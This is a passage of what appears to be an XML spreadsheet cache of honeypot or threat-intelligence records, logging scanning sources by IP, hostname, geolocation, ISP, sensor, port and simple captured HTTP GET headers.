    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:861a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3755"/>
    <x v="3755"/>
    <s v="NA&amp;&amp;114-33-88-168.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T14:25:35"/>
    <d v="2024-12-24T09:03:55"/>
    <d v="2025-04-01T14:25:35"/>
    <n v="314"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;80&amp;&amp;11711&amp;&amp;39760&amp;&amp;39758&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:58a8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3756"/>
    <x v="3756"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:15:52"/>
    <d v="2025-04-01T14:15:52"/>
    <d v="2025-04-01T14:15:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="52"/>
    <s v="Lampang"/>
    <s v="Chae Hom"/>
    <s v="Chae Hom"/>
    <s v="1153800"/>
    <s v="NA"/>
    <s v="18.7127"/>
    <s v="99.5576"/>
    <s v="131090"/>
    <s v="CAT-IDC-4bytenet-AS-AP"/>
    <s v="CAT Telecom Public Company Limited"/>
    <s v="consumer"/>
    <s v="Cat Bb"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:86ec:a09e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3757"/>
    <x v="3757"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:14:11"/>
    <d v="2025-04-01T14:14:11"/>
    <d v="2025-04-01T14:14:11"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:e5b7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3758"/>
    <x v="3758"/>
    <s v="2.69.68.47.mobile.tre.se"/>
    <x v="0"/>
    <d v="2025-04-01T14:09:13"/>
    <d v="2025-04-01T14:09:13"/>
    <d v="2025-04-01T14:09:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm (Kungsholmen)"/>
    <s v="2673730"/>
    <s v="104 25"/>
    <s v="59.3351"/>
    <s v="18.0139"/>
    <s v="44034"/>
    <s v="hi3g"/>
    <s v="Hi3G Access AB"/>
    <s v="consumer"/>
    <s v="Hi3G Access AB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2006-08-09 00:00:00"/>
    <s v="2025-07-30 00:00:00"/>
    <s v="2024-07-21 00:00:00"/>
    <s v="['ns2.hi3gaccess.se 80.251.192.245', 'ns.hi3gaccess.se 80.251.192.244', 'a.ns.ip-only.net 212.112.160.42']"/>
    <s v="CSC Corp Domains"/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:245:442f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3759"/>
    <x v="3759"/>
    <s v="125-229-52-69.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:04:23"/>
    <d v="2024-09-07T06:37:00"/>
    <d v="2025-04-01T14:04:23"/>
    <n v="502"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;54256&amp;&amp;80&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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7de5:3445"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3760"/>
    <x v="3760"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:55:29"/>
    <d v="2025-03-30T20:28:48"/>
    <d v="2025-04-01T13:55:29"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70ad:4108"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3761"/>
    <x v="3761"/>
    <s v="59-127-42-230.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:52:27"/>
    <d v="2024-08-27T05:35:07"/>
    <d v="2025-04-01T13:52:27"/>
    <n v="525"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;43045&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;43352"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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3b7f:2ae6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3762"/>
    <x v="3762"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:52:17"/>
    <d v="2025-03-27T00:46:26"/>
    <d v="2025-04-01T13:52:17"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="59"/>
    <s v="North Kazakhstan"/>
    <s v="Kyzylzhar District"/>
    <s v="Petropavl"/>
    <s v="1520172"/>
    <s v="NA"/>
    <s v="54.8732"/>
    <s v="69.1506"/>
    <s v="51997"/>
    <s v="LLP Asket"/>
    <s v="LLP Asket"/>
    <s v="business"/>
    <s v="LLP Asket"/>
    <s v="2011-10-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b062:c81e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3763"/>
    <x v="3763"/>
    <s v="114-33-17-89.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:47:40"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T13:47:40"/>
    <n v="362"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;23757"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:1159"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3764"/>
    <x v="3764"/>
    <s v="122-116-127-90.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:43:39"/>
    <d v="2024-07-16T14:15:49"/>
    <d v="2025-04-01T13:43:39"/>
    <n v="714"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;80&amp;&amp;14174&amp;&amp;42621&amp;&amp;NA&amp;&amp;35379&amp;&amp;35416&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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7a74:7f5a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3765"/>
    <x v="3765"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:43:21"/>
    <d v="2025-04-01T13:40:17"/>
    <d v="2025-04-01T13:43:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="BC"/>
    <s v="British Columbia"/>
    <s v="Metro Vancouver Regional District"/>
    <s v="Port Coquitlam"/>
    <s v="6111706"/>
    <s v="V3B"/>
    <s v="49.2574"/>
    <s v="-122.737"/>
    <s v="394256"/>
    <s v="Tech Futures Interactive Inc."/>
    <s v="Tech Futures Interactive Inc."/>
    <s v="hosting"/>
    <s v="Tech Futures Interactive Inc"/>
    <s v="2014-09-19"/>
    <s v="CLOUDSINGULARITY"/>
    <s v="2023-05-08"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68c1:8766"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3766"/>
    <x v="3766"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:42:07"/>
    <d v="2025-04-01T13:42:07"/>
    <d v="2025-04-01T13:42:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:e6d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3767"/>
    <x v="3767"/>
    <s v="NA&amp;&amp;220-134-29-32.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T13:33:52"/>
    <d v="2024-07-02T14:26:00"/>
    <d v="2025-04-01T13:33:52"/>
    <n v="222"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:1d20"/>
    <s v="C-I_D"/>
